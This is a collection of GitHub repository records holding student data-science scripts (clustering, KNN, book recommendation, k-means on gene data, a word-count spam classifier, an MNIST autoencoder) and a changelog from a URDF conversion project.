airline.\r\n\nplt.scatter(cluster1['Balance'],cluster1['Bonus_miles'],c='red',label='cluster1')\r\nplt.scatter(cluster2['Balance'],cluster2['Bonus_miles'],c='blue',label='cluster2')\r\nplt.scatter(cluster3['Balance'],cluster3['Bonus_miles'],c='magenta',label='cluster3')\r\nplt.scatter(cluster4['Balance'],cluster4['Bonus_miles'],c='black',label='cluster4')\r\nplt.scatter(kmeans_f.cluster_centers_[:,0],kmeans_f.cluster_centers_[:,1],c='cyan',label='centroids')\r\nplt.show()\r\n\ndata.iloc[:,:].groupby('cluster').mean()\r\n\nsns.pairplot(data,hue='cluster')\r\n \r\n \r\n####Hierarchical clustering ####\r\nimport scipy.cluster.hierarchy as sch\r\nz=sch.linkage(data, method = 'ward',metric='euclidean')\r\nplt.figure(figsize=(15,10));plt.title('Hierarchical Clustering 
Dendrogram')\r\nsch.dendrogram(z,\r\n           leaf_rotation=0.,);plt.show()\r\n\n#alternative method\r\nfrom sklearn.cluster import AgglomerativeClustering\r\nh_cluster= AgglomerativeClustering(n_clusters=4,affinity='euclidean',linkage='ward').fit(data) \r\n\ndata['cluster']=h_cluster.labels_\r\ndata.iloc[:,0:].groupby('cluster').mean()\r\n\ndata.to_csv('EastWestAirlines.csv',encoding='utf-8')\r\n" }, { "alpha_fraction": 0.5979381203651428, "alphanum_fraction": 0.6201427578926086, "avg_line_length": 25.736263275146484, "blob_id": "ff53d4436fccdeeb962234e0662f5be3f66bdf96", "content_id": "b3d106ae61c0746678c490e1f1437b3cc4c2cca0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2522, "license_type": "no_license", "max_line_length": 90, "num_lines": 91, "path": "/KNN/glass.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct  2 18:04:36 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\n\r\ndata = pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\KNN\\\\glass.csv')\r\ndata\r\n\r\ndata.describe()\r\ndata.info()\r\ndata.nunique()\r\ndata.columns\r\n\r\n#Preprocessing \r\n#standardization\r\ndef norm_func(i):\r\n    x= (i - i.min())/(i.max()-i.min())\r\n    return(x)\r\n\r\ndata.iloc[:,[0,1,2,3,4,6,]] = norm_func(data.iloc[:,[0,1,2,3,4,6,]])\r\n\r\n#EDA \r\ncor = data.corr()\r\nsns.heatmap(cor)\r\n# =============================================================================\r\n# help(np.corrcoef)\r\n# Ca and Ri are highly correlated, therefore we will drop Ca or Ri (in this case Ca)\r\n# Ca and K have very low correlation, \r\n# K has very little correlation with Type, therefore we will drop K also\r\n# =============================================================================\r\ng= sns.pairplot(data,hue = 'Type',diag_kind = 'hist')\r\n\r\nsns.boxplot(x= 'Type',y= 'RI',data =data)\r\nsns.boxplot(x= 'Type',y= 'Na',data =data)\r\nsns.boxplot(x= 'Type',y= 'Mg',data =data)\r\nsns.boxplot(x= 'Type',y= 'Al',data =data)\r\nsns.boxplot(x= 'Type',y= 'Si',data =data)\r\nsns.boxplot(x= 'Type',y= 'K',data =data)\r\nsns.boxplot(x= 'Type',y= 'Ca',data =data)\r\n\r\n#dropping K and Ca only after plotting them, otherwise the boxplots above would fail\r\ndata = data.drop(data.iloc[:,[5,6]],axis =1)\r\n#the remaining features are only weakly correlated\r\n\r\n# Target and independent variables\r\nX = data.iloc[:,0:7]\r\nY = data.iloc[:,-1]\r\n\r\n#splitting data into train\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(X, Y, test_size = 0.25,random_state = 42)\r\n\r\n####conventional method####\r\n#KNN classification\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nmodel = KNeighborsClassifier(n_neighbors = 5)\r\nmodel.fit(x_train,y_train)\r\nmodel.predict(x_test)\r\n\r\n#training accuracy\r\nmodel.score(x_train,y_train) #0.775\r\n#test accuracy\r\nmodel.score(x_test,y_test) #0.703\r\n\r\n#storing the results for original dataset\r\ndata['y_pred'] = model.predict(X)\r\n\r\n#overall mean accuracy\r\nnp.mean(data.Type == data.y_pred) #0.757\r\n\r\n\r\n####Using for Loop####\r\nfrom sklearn import metrics\r\nk_range = range(1,10)\r\nscores={}\r\nscores_list = []\r\nfor k in k_range:\r\n    model = KNeighborsClassifier(n_neighbors = k)\r\n    model.fit(x_train,y_train)\r\n    y_pred = model.predict(x_test)\r\n    scores[k]= metrics.accuracy_score(y_test,y_pred)\r\n    scores_list.append(metrics.accuracy_score(y_test,y_pred))\r\n    
\r\nprint(scores_list)\r\n#highest accuracy is obtained with k = 3 neighbors, i.e. 75.92%" }, { "alpha_fraction": 0.6950953602790833, "alphanum_fraction": 0.7196184992790222, "avg_line_length": 29.384614944458008, "blob_id": "5a7fc9aab3a09d0b3cf893808795a63d3574bed7", "content_id": "444e86ef1d2f231fafcc6ba565cc63402f0cfb01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3670, "license_type": "no_license", "max_line_length": 128, "num_lines": 117, "path": "/Recommendation System/Recommandation Assignment.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 18 19:48:52 2021\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nbook_df= pd.read_csv(\"E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Recommandation\\\\book.csv\",encoding=('ISO-8859-1'))\r\nbook_df[0:5]\r\nbook_df=book_df.drop('Unnamed: 0',axis=1)\r\nbook_df=book_df.rename({'User.ID':'UserID','Book.Title':'BookTitle','Book.Rating':'BookRating'},axis=1)\r\nbook_df\r\nlen(book_df.UserID.unique())\r\nlen(book_df.BookTitle.unique())\r\nimport seaborn as sns\r\nsns.pairplot(book_df)\r\nuser_book_df=book_df.pivot_table(index='UserID', columns='BookTitle', values='BookRating',aggfunc='mean').reset_index(drop=True)\r\nuser_book_df\r\nuser_book_df = book_df.groupby(['UserID', 'BookTitle'])['BookRating'].mean().unstack()\r\nuser_book_df\r\nuser_book_df.index = book_df.UserID.unique()\r\nuser_book_df\r\nuser_book_df.fillna(0, inplace=True)\r\nuser_book_df\r\nfrom sklearn.metrics import pairwise_distances\r\nfrom scipy.spatial.distance import cosine, correlation\r\nuser_sim= 1 - pairwise_distances( user_book_df.values,metric='cosine')\r\nuser_sim= 1 - pairwise_distances( user_book_df.values,metric='correlation')\r\nuser_sim\r\n\r\n#Store the results in a dataframe\r\nuser_sim_df = pd.DataFrame(user_sim)\r\n\r\n#Set the index and column names to user ids \r\nuser_sim_df.index = book_df.UserID.unique()\r\nuser_sim_df.columns = book_df.UserID.unique()\r\n\r\nuser_sim_df.iloc[0:50, 0:50]\r\n\r\nnp.fill_diagonal(user_sim, 0)\r\nuser_sim_df.iloc[0:50, 0:50]\r\n\r\nuser_sim_df.idxmax(axis=1)[0:50]\r\n\r\nbook_df[(book_df['UserID']==276813 ) | (book_df['UserID']==3546)]\r\n\r\nuser_1=book_df[book_df['UserID']==276872]\r\nuser_2=book_df[book_df['UserID']==161677]\r\n\r\nuser_1.BookTitle\r\nuser_2.BookTitle\r\n\r\npd.merge(user_1,user_2,on='BookTitle',how='outer')\r\n\r\n#Alternative Method:\r\n#(Recommending Similar Books)\r\n\r\nbook_df.groupby('BookTitle')['BookRating'].mean().sort_values(ascending=False).head()\r\n\r\nratings = pd.DataFrame(book_df.groupby('BookTitle')['BookRating'].mean())\r\n\r\nratings.head()\r\n\r\nratings['num of ratings'] = pd.DataFrame(book_df.groupby('BookTitle')['BookRating'].count())\r\nratings.head()\r\n\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n#%matplotlib inline (IPython magic, only valid inside a notebook)\r\n\r\nplt.figure(figsize=(10,4))\r\nratings['num of ratings'].hist(bins=70)\r\n\r\nplt.figure(figsize=(10,4))\r\nratings['BookRating'].hist(bins=70)\r\n\r\nsns.jointplot(x='BookRating',y='num of ratings',data=ratings,alpha=0.5)\r\n\r\nmoviemat =book_df.pivot_table(index='UserID',columns='BookTitle',values='BookRating')\r\nmoviemat.head()\r\n\r\nratings.sort_values('num of ratings',ascending=False).head(10)\r\n\r\nratings.head(12)\r\n\r\nstardust_user_ratings = moviemat['Stardust']\r\ntheamber_user_ratings = moviemat['The Amber Spyglass (His Dark 
Materials, Book 3)']\r\nstardust_user_ratings.head()\r\n\r\nsimilar_to_stardust = moviemat.corrwith(stardust_user_ratings)\r\nsimilar_to_theamber= moviemat.corrwith(theamber_user_ratings)\r\n\r\ncorr_stardust = pd.DataFrame(similar_to_stardust,columns=['Correlation'])\r\ncorr_stardust.dropna(inplace=True)\r\ncorr_stardust\r\n\r\ncorr_stardust.sort_values('Correlation',ascending=False).head()\r\n\r\ncorr_stardust = corr_stardust.join(ratings['num of ratings'])\r\ncorr_stardust\r\n\r\ncorr_stardust[corr_stardust['num of ratings']>3].sort_values('Correlation',ascending=False).head()\r\n\r\ncorr_theamber = pd.DataFrame(similar_to_theamber,columns=['Correlation'])\r\n\r\ncorr_theamber.dropna(inplace=True)\r\n\r\ncorr_theamber = corr_theamber.join(ratings['num of ratings'])\r\n\r\ncorr_theamber[corr_theamber['num of ratings']>3].sort_values('Correlation',ascending=False).head()\r\n\r\n##conclusion:\r\n## we can conclude that both The Amber Spyglass (His Dark Materials, Book 3) and Stardust have the same ratings (see corr_theamber above)." } ]
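The recommendation script above builds a user-item matrix with pivot_table and ranks users and titles via pairwise_distances and corrwith. A minimal self-contained sketch of the same user-similarity step, using invented toy ratings rather than the book.csv file the assignment loads, might look like this:
~~~
import numpy as np
import pandas as pd
from sklearn.metrics import pairwise_distances

# Hypothetical toy ratings (user, title, rating); the real script loads book.csv.
ratings = pd.DataFrame({
    'UserID':     [1, 1, 2, 2, 3],
    'BookTitle':  ['A', 'B', 'A', 'C', 'B'],
    'BookRating': [5, 3, 4, 2, 5],
})

# User-item matrix, missing ratings filled with 0 (as in the script above).
user_item = ratings.pivot_table(index='UserID', columns='BookTitle',
                                values='BookRating', aggfunc='mean').fillna(0)

# Cosine similarity between users; zero the diagonal so a user is not
# reported as their own nearest neighbour.
sim = 1 - pairwise_distances(user_item.values, metric='cosine')
np.fill_diagonal(sim, 0)
sim_df = pd.DataFrame(sim, index=user_item.index, columns=user_item.index)

# Most similar user for each user, mirroring user_sim_df.idxmax(axis=1) above.
print(sim_df.idxmax(axis=1))
~~~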
34
NurbekSakiev/Data_Mining
https://github.com/NurbekSakiev/Data_Mining
4d20602e0c2a66a77c127a1eedf248e42d97c93a
f21c5d37c139406e37097d3644b875fbe9481159
e0259257da3bd95804054a9ee384d9b35a3b9bd5
refs/heads/master
2021-01-01T19:11:33.961087
2015-04-27T18:26:30
2015-04-27T18:26:30
31,588,874
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6036199331283569, "alphanum_fraction": 0.6371040940284729, "avg_line_length": 24.697673797607422, "blob_id": "835cf2b339ca639dd9c25bb471ef2c2dc22f4cde", "content_id": "e23865fb945b663f06ea1984df22ae91844af17c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1105, "license_type": "no_license", "max_line_length": 88, "num_lines": 43, "path": "/Assgn2.py", "repo_name": "NurbekSakiev/Data_Mining", "src_encoding": "UTF-8", "text": "total = 0\nfor i in range(1,74):\n\tfh = open ('/Users/Nur/Documents/Spring_2015/Data_Mining/Assignment02/Track1/gene.txt')\n\tdata = []\n\tfor line in fh.readlines():\n\t\ty = [value for value in line.split()]\n\t\tdata.append(y[i])\n\tfirst = []\n\tsecond = []\n\ttotal_1 = 0\n\ttotal_2 = 0\n\n\tdata = map(float,data)\n\tfirst = data[:len(data)/2]\n\tsecond = data[len(data)/2:]\n\trepeat = True\n\tcount = 0\n\terror=0\n\twhile (repeat):\n\t\tcount = count+1\n\t\ttotal_1 = sum(first)\n\t\ttotal_2 = sum(second)\n\t\tcentroid_1 = total_1/len(first)\n\t\tcentroid_2 = total_2/len(second)\n\t\tfirst_len = len(first)\n\t\tsecond_len = len(second)\n\t\tfor l in range(len(data)):\n\t\t\tif(abs(data[l]-centroid_1)>abs(data[l]-centroid_2)):\n\t\t\t\tsecond.append(data[l])\n\t\t\telse:\n\t\t\t\tfirst.append(data[l])\n\t\tfirst = first[first_len:]\n\t\tsecond = second[second_len:]\n\t\tif(total_1 == sum(first) and total_2 == sum(second)):\n\t\t\tbreak\n\tfor k in range(len(first)):\n\t\terror = error + (abs(centroid_1-first[k]))\n\tfor j in range(len(second)):\n\t\terror = error + (abs(centroid_2-second[j]))\n\ttotal = total + error\n\tdata = data[492:]\n\tfh.close()\nprint \"The total error is \", total/74\n" }, { "alpha_fraction": 0.6966261863708496, "alphanum_fraction": 0.7149797677993774, "avg_line_length": 33.296295166015625, "blob_id": "47598ee12f46052198cf4c48ff732bbd8fe739c8", "content_id": "1ede2ab534bdb2cff9d0c3d52966294d92df28e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3705, "license_type": "no_license", "max_line_length": 126, "num_lines": 108, "path": "/Test.py", "repo_name": "NurbekSakiev/Data_Mining", "src_encoding": "UTF-8", "text": "from collections import Counter\nimport math\n\n\n# Connects all texts and returns the final string\ndef get_combined_text(directory,folder_name,file_name,start_file,end_file):\n\ttest_result = ''\n\tfor i in range(start_file,end_file+1,1):\n\t\ttest = open(directory+folder_name+'/'+file_name+str(i)+'.txt').read()\n\t\ttest_result = test_result + test\n\treturn test_result\n\n# Returns the product of top 100 words probabilities\ndef top_common_words_prob(words_dict, total_num_words):\n\tprob_dict = {}\n\tprob_total = 1.0\n\tfor k,v in words_dict.most_common(100):\n\t\tprob_dict[k] = (words_dict[k]/float(total_num_words))\n\t\tprob_total = prob_total * prob_dict[k]\n\treturn prob_total\n\n\n# Normalizing the length of spam and non-spam trainings\ndef normalize_data(train_spam_count, train_spam_len, train_non_count, train_non_len):\n\tif train_spam_len < train_non_len:\n\t\tconstant = train_non_len/float(train_spam_len)\n\t\tfor k in train_spam_count.keys():\n\t\t\ttrain_spam_count[k] = train_spam_count[k] * constant\n\t\treturn train_spam_count\n\telse:\n\t\tconstant = train_spam_len/float(train_non_len)\n\t\tfor k in train_non_count.keys():\n\t\t\ttrain_non_count[k]= train_non_count[k] * constant\n\t\treturn train_non_count\n\n# Final part of printing if it is spam or not\ndef 
calculate_prob(words_count,train_spam_words,train_non_words):\n\tspam_prob = 0\n\tnon_prob = 0\n\tfor k in words_count.keys():\n\t\tif((k in train_non_words) and (k in train_spam_words)):\n\t\t\tspam_prob = spam_prob + train_spam_words[k]\n\t\t\tnon_prob = non_prob + train_non_words[k]\n\t\t\tprint k,train_non_words[k], train_spam_words[k]\n\t\telif (k in train_non_words):\n\t\t\tspam_prob = spam_prob + 0.01\n\t\t\tnon_prob = non_prob + train_non_words[k]\n\t\t\t#print spam_prob, non_prob\n\t\telif (k in train_spam_words):\n\t\t\tspam_prob = spam_prob + train_spam_words[k]\n\t\t\tnon_prob = non_prob + 0.01\n\t\t\t##print spam_prob, non_prob\n\t#print spam_prob, non_prob\n\tif (spam_prob<non_prob):\n\t\tprint 'not spam'\n\telse:\n\t\tprint 'spam'\n\ndir = '/Users/Nur/Documents/Spring_2015/Data_Mining/Assignment04/Data/'\n\ntrain_non_str = get_combined_text(dir,'NonSpamTrain250','NonSpamTrain',1,250)\ntrain_non_count_words = Counter(train_non_str.split())\ntrain_non_text_len = len(train_non_str.split())\n##train_non_common = top_common_words_prob(train_non_count_words, train_non_text_len)\n\n\ntrain_spam_str = get_combined_text(dir,'SpamTrain250','spamtrain',1,250)\ntrain_spam_count_words = Counter(train_spam_str.split())\ntrain_spam_text_len = len(train_spam_str.split())\ntrain_spam_common = top_common_words_prob(train_spam_count_words, train_spam_text_len)\n\n\n\nif (train_non_text_len < train_spam_text_len):\n\ttrain_non_count_words = normalize_data(train_spam_count_words,train_spam_text_len,train_non_count_words, train_non_text_len)\nelse:\n\ttrain_spam_count_words = normalize_data(train_spam_count_words,train_spam_text_len,train_non_count_words, train_non_text_len)\n\nprint train_non_count_words.most_common(30)\nprint train_spam_count_words.most_common(30)\n\ntest_str = get_combined_text(dir,'NonSpamTest100','NonSpamTest',10,15)\ntest_count_words = Counter(test_str.split())\ntest_text_len = len(test_str.split())\n\n\ncalculate_prob(test_count_words, train_spam_count_words, train_non_count_words)\n\n'''\nprint train_non_count_words.most_common(20)\nprint train_spam_text_len, train_non_text_len\nprint train_spam_text_len/float(train_non_text_len)\n'''\n\n'''\ntest = {}\ntest = test_count_words.most_common(20)\nfor k,v in test:\n\tif(k in train_non_count_words):\n\t\tprint k,train_non_count_words[k]\nprint '---------------'\nfor k,v in test:\n\tif(k in train_spam_count_words):\n\t\tprint k,train_spam_count_words[k]\n'''\n##print train_non_common * math.pow(10,250)\n##print train_spam_common * math.pow(10,250)\n##print test_total_prob * math.pow(10,240)\n\n" } ]
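The Test.py listing above scores a message by summing raw per-class word counts, with an ad-hoc 0.01 fallback for unseen words. For comparison, a minimal multinomial naive Bayes sketch in log space with Laplace smoothing, which is the standard formulation of the same idea, is shown below. The toy corpora and helper names are invented for illustration and are not part of the repository listing.
~~~
import math
from collections import Counter

def train_counts(docs):
    # Word counts over a list of whitespace-tokenised documents.
    c = Counter()
    for d in docs:
        c.update(d.split())
    return c

def log_score(text, counts, vocab_size, alpha=1.0):
    # Sum of log P(word | class) with Laplace smoothing; Counter returns 0
    # for unseen words, so alpha keeps every probability strictly positive.
    total = sum(counts.values())
    return sum(math.log((counts[w] + alpha) / (total + alpha * vocab_size))
               for w in text.split())

# Hypothetical toy corpora; the real assignment reads SpamTrain250/NonSpamTrain250.
spam = train_counts(["win money now", "free money offer"])
ham = train_counts(["meeting at noon", "project report attached"])
vocab = len(set(spam) | set(ham))

test = "free money"
print("spam" if log_score(test, spam, vocab) > log_score(test, ham, vocab)
      else "not spam")
~~~
Working in log space avoids the underflow that the listing above works around by multiplying many small probabilities and rescaling with math.pow(10, 250).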
2
liacov/homework4_nndl
https://github.com/liacov/homework4_nndl
30adc1f52044f75d392417823855675a643f962c
02ad47bfa06003ef1b978771ca0d2f78a7771606
66f710b718335275949cf61d3df723d828cf9297
refs/heads/master
2022-12-08T06:43:15.418317
2020-08-19T09:28:58
2020-08-19T09:28:58
286,746,191
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5497311949729919, "alphanum_fraction": 0.5667155385017395, "avg_line_length": 34.894737243652344, "blob_id": "d2e92f7c1b88aa42cd48b17c75506d716a5dffdd", "content_id": "fd27c77cc50430806fc1e4019bb28b1a4733644e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8184, "license_type": "no_license", "max_line_length": 107, "num_lines": 228, "path": "/modules/autoencoder.py", "repo_name": "liacov/homework4_nndl", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport torch\nimport random\nimport numpy as np\nfrom torch import nn\nfrom tqdm import tqdm\nfrom copy import deepcopy\nimport matplotlib.pyplot as plt\nfrom torchvision import transforms\nfrom torchvision.datasets import MNIST\nfrom sklearn.model_selection import KFold\nfrom torch.utils.data import DataLoader, Subset\n\n\n#%% Define the network architecture\n\nclass Autoencoder(nn.Module):\n\n def __init__(self, encoded_space_dim):\n super().__init__()\n\n ### Encoder\n self.encoder_cnn = nn.Sequential(\n nn.Conv2d(1, 8, 3, stride=2, padding=1),\n nn.ReLU(True),\n nn.Conv2d(8, 16, 3, stride=2, padding=1),\n nn.ReLU(True),\n nn.Conv2d(16, 32, 3, stride=2, padding=0),\n nn.ReLU(True)\n )\n self.encoder_lin = nn.Sequential(\n nn.Linear(3 * 3 * 32, 64),\n nn.ReLU(True),\n nn.Linear(64, encoded_space_dim)\n )\n\n ### Decoder\n self.decoder_lin = nn.Sequential(\n nn.Linear(encoded_space_dim, 64),\n nn.ReLU(True),\n nn.Linear(64, 3 * 3 * 32),\n nn.ReLU(True)\n )\n self.decoder_conv = nn.Sequential(\n nn.ConvTranspose2d(32, 16, 3, stride=2, output_padding=0),\n nn.ReLU(True),\n nn.ConvTranspose2d(16, 8, 3, stride=2, padding=1, output_padding=1),\n nn.ReLU(True),\n nn.ConvTranspose2d(8, 1, 3, stride=2, padding=1, output_padding=1)\n )\n\n def forward(self, x):\n x = self.encode(x)\n x = self.decode(x)\n return x\n\n def encode(self, x):\n # Apply convolutions\n x = self.encoder_cnn(x)\n # Flatten\n x = x.view([x.size(0), -1])\n # Apply linear layers\n x = self.encoder_lin(x)\n return x\n\n def decode(self, x):\n # Apply linear layers\n x = self.decoder_lin(x)\n # Reshape\n x = x.view([-1, 32, 3, 3])\n # Apply transposed convolutions\n x = self.decoder_conv(x)\n x = torch.sigmoid(x)\n return x\n\n### Training function\ndef train_epoch(net, dataloader, loss_fn, optimizer, device):\n # Training\n net.train()\n train_loss = []\n for sample_batch in dataloader:\n # Extract data and move tensors to the selected device\n image_batch = sample_batch[0].to(device)\n # Forward pass\n output = net(image_batch)\n loss = loss_fn(output, image_batch)\n # Backward pass\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n # Save current loss\n train_loss.append(loss.data.item())\n return np.mean(train_loss)\n\n### Testing function\ndef test_epoch(net, dataloader, loss_fn, optimizer, device):\n # Validation\n net.eval() # Evaluation mode (e.g. 
disable dropout)\n with torch.no_grad(): # No need to track the gradients\n conc_out = torch.Tensor().float()\n conc_label = torch.Tensor().float()\n for sample_batch in dataloader:\n # Extract data and move tensors to the selected device\n image_batch = sample_batch[0].to(device)\n # Forward pass\n out = net(image_batch)\n # Concatenate with previous outputs\n conc_out = torch.cat([conc_out, out.cpu()])\n conc_label = torch.cat([conc_label, image_batch.cpu()])\n del image_batch\n # Evaluate global loss\n val_loss = loss_fn(conc_out, conc_label)\n return val_loss.data\n\n\n### k-Fold Cross Validation function\ndef train_CV(indices, device, train_dataset, encoded_dim=8, lr=1e-3, wd=0, num_epochs=20):\n # K_FOLD parameters\n kf = KFold(n_splits=3, random_state=42, shuffle=True)\n\n train_loss_log = []\n val_loss_log = []\n\n for fold, (train_idx, valid_idx) in enumerate(kf.split(indices)):\n print(\"+++ FOLD {} +++\".format(fold))\n\n train_loss_log_fold = []\n val_loss_log_fold = []\n\n # initialize the net\n cv_net = Autoencoder(encoded_space_dim=encoded_dim)\n\n # Move all the network parameters to the selected device\n # (if they are already on that device nothing happens)\n cv_net.to(device)\n\n ### Define a loss function\n loss_fn = torch.nn.MSELoss()\n\n ### Define an optimizer\n optim = torch.optim.Adam(cv_net.parameters(), lr=lr, weight_decay=wd)\n\n # create the dataloaders\n train_dataloader_fold = DataLoader(Subset(train_dataset, train_idx), batch_size=500, shuffle=False)\n valid_dataloader_fold = DataLoader(Subset(train_dataset, valid_idx), batch_size=500, shuffle=False)\n\n\n for epoch in range(num_epochs):\n print('EPOCH %d/%d' % (epoch + 1, num_epochs))\n ### Training\n avg_train_loss = train_epoch(cv_net, dataloader=train_dataloader_fold,\n loss_fn=loss_fn, optimizer=optim,\n device=device)\n ### Validation\n avg_val_loss = test_epoch(cv_net, dataloader=valid_dataloader_fold,\n loss_fn=loss_fn, optimizer=optim,\n device=device)\n # Print loss\n print('\\t TRAINING - EPOCH %d/%d - loss: %f' % (epoch + 1, num_epochs, avg_train_loss))\n print('\\t VALIDATION - EPOCH %d/%d - loss: %f\\n' % (epoch + 1, num_epochs, avg_val_loss))\n\n # Log\n train_loss_log_fold.append(avg_train_loss)\n val_loss_log_fold.append(avg_val_loss)\n\n train_loss_log.append(train_loss_log_fold)\n val_loss_log.append(val_loss_log_fold)\n\n return {\"train loss\": np.mean(train_loss_log, axis=0),\n \"validation loss\": np.mean(val_loss_log, axis=0)}\n\n\n### Testing function with random noise\ndef test_random_noise(net, dataloader, loss_fn, device, noise_type, sigma = 1, plot = True):\n \"\"\" Test the trained autoencoder on randomly corrupted images.\n The random noise can be generated using the 'gaussian', 'uniform' or 'occlusion' method. \"\"\"\n np.random.seed(42)\n\n net.eval() # Evaluation mode (e.g. 
disable dropout)\n with torch.no_grad(): # No need to track the gradients\n conc_out = torch.Tensor().float()\n conc_label = torch.Tensor().float()\n for sample_batch in dataloader:\n # Extract data and move tensors to the selected device\n image_batch = sample_batch[0].to(device)\n # Add noise\n gaussian = ''\n if noise_type == 'Gaussian':\n noise = torch.Tensor(np.random.normal(0,sigma,sample_batch[0].shape))\n corrupted_image = (sample_batch[0] + noise).to(device)\n gaussian = f' with N(0, {sigma})'\n if noise_type == 'Uniform':\n noise = torch.Tensor(np.random.rand(*sample_batch[0].shape))\n corrupted_image = (sample_batch[0] + noise).to(device)\n if noise_type == 'Occlusion':\n idx = np.random.choice((0,1), 2)\n corrupted_image = deepcopy(image_batch)\n corrupted_image[:, :, idx[0]*14:(idx[0]+1)*14, idx[1]*14:(idx[1]+1)*14] = 0\n\n # Forward pass\n out = net(corrupted_image)\n\n # Concatenate with previous outputs\n conc_out = torch.cat([conc_out, out.cpu()])\n conc_label = torch.cat([conc_label, image_batch.cpu()])\n\n # plot images\n if plot:\n plt.figure(figsize=(15, 5))\n plt.subplot(1, 3, 1)\n plt.title(\"Original\", fontsize=18)\n plt.imshow(image_batch[0].squeeze().cpu(), cmap='gist_gray')\n plt.subplot(1, 3, 2)\n plt.title(f\"{noise_type} noise\"+gaussian, fontsize=18)\n plt.imshow(corrupted_image[0].squeeze().cpu(), cmap='gist_gray')\n plt.subplot(1, 3, 3)\n plt.title(\"Reconstructed\", fontsize=18)\n plt.imshow(out[0].squeeze().cpu(), cmap='gist_gray')\n plt.savefig(f\"./images/{noise_type}\" + gaussian + \".png\")\n plt.show()\n\n\n # Evaluate global loss\n val_loss = loss_fn(conc_out, conc_label)\n\n return val_loss.data\n" } ]
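The autoencoder.py module above only defines the network and its train/test helpers; it never instantiates them. A minimal usage sketch, assuming the file is importable as modules.autoencoder and reusing the signatures shown in the listing (the MNIST download path, epoch count and hyperparameters are illustrative):
~~~
import torch
from torch import nn
from torchvision import transforms
from torchvision.datasets import MNIST
from torch.utils.data import DataLoader

# Assumes the module above is on the path as modules/autoencoder.py.
from modules.autoencoder import Autoencoder, train_epoch

device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
net = Autoencoder(encoded_space_dim=8).to(device)
loss_fn = nn.MSELoss()
optim = torch.optim.Adam(net.parameters(), lr=1e-3)

train_set = MNIST(root='data', train=True, download=True,
                  transform=transforms.ToTensor())
loader = DataLoader(train_set, batch_size=500, shuffle=True)

for epoch in range(5):
    # train_epoch runs one pass over the loader and returns the mean batch loss.
    avg_loss = train_epoch(net, dataloader=loader, loss_fn=loss_fn,
                           optimizer=optim, device=device)
    print(f'epoch {epoch}: train loss {avg_loss:.4f}')
~~~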
1
robotology/simmechanics-to-urdf
https://github.com/robotology/simmechanics-to-urdf
1cde25697027241088e7c638b12125f249b35828
9431d99570921d20002461a02d4974020e97f22a
33cc2d35daac0d7765c7a5afa56fcb6a40032b2c
refs/heads/master
2023-03-31T03:25:05.419383
2023-03-28T16:42:46
2023-03-28T16:42:46
22,375,697
32
7
null
2014-07-29T10:05:55
2023-01-17T21:08:36
2023-03-28T16:42:46
Python
[ { "alpha_fraction": 0.6683608889579773, "alphanum_fraction": 0.725540041923523, "avg_line_length": 30.479999542236328, "blob_id": "5f80a63c3cec2dd4fc346c758a1650652e9bedeb", "content_id": "3ee746953173dfdaad67a3d5207aac1a1d4309a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 787, "license_type": "no_license", "max_line_length": 153, "num_lines": 25, "path": "/CHANGELOG.md", "repo_name": "robotology/simmechanics-to-urdf", "src_encoding": "UTF-8", "text": "# Changelog\nAll notable changes to this project will be documented in this file.\n\nThe format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).\nand this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).\n\n## [Unreleased]\n\n### Add\n- Add the possibility to export the frame coincident with the ft sensor frame (https://github.com/robotology/simmechanics-to-urdf/pull/53).\n\n## [0.4.1] - 2022-12-20\n\n### Fixed\n\n- Fixed version number in setup.py (https://github.com/robotology/simmechanics-to-urdf/pull/54).\n\n## [0.4.0] - 2022-12-20\n\n### Add\n- Add the possibility to assign the colors in the yaml file when the urdf model is generated (https://github.com/robotology/simmechanics-to-urdf/pull/51)\n\n## [0.3.0] - 2022-01-28\n\nFirst tagged release.\n" }, { "alpha_fraction": 0.47826087474823, "alphanum_fraction": 0.47826087474823, "avg_line_length": 22, "blob_id": "607b99887615a6fb3c429dbcd0bf1931611051d6", "content_id": "584ce6d35d80d5f906acd5febbfb363f0a71b4f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23, "license_type": "no_license", "max_line_length": 22, "num_lines": 1, "path": "/simmechanics_to_urdf/__init__.py", "repo_name": "robotology/simmechanics-to-urdf", "src_encoding": "UTF-8", "text": "__all__ = [\"firstgen\"]\n" }, { "alpha_fraction": 0.6953208446502686, "alphanum_fraction": 0.7036541700363159, "avg_line_length": 76.37931060791016, "blob_id": "70c195685a573f8232ffb4504a9b91eb62291ff9", "content_id": "7f1ad43ca2a222f64e0fc733ffdbec4c0973529a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 22440, "license_type": "no_license", "max_line_length": 762, "num_lines": 290, "path": "/README.md", "repo_name": "robotology/simmechanics-to-urdf", "src_encoding": "UTF-8", "text": 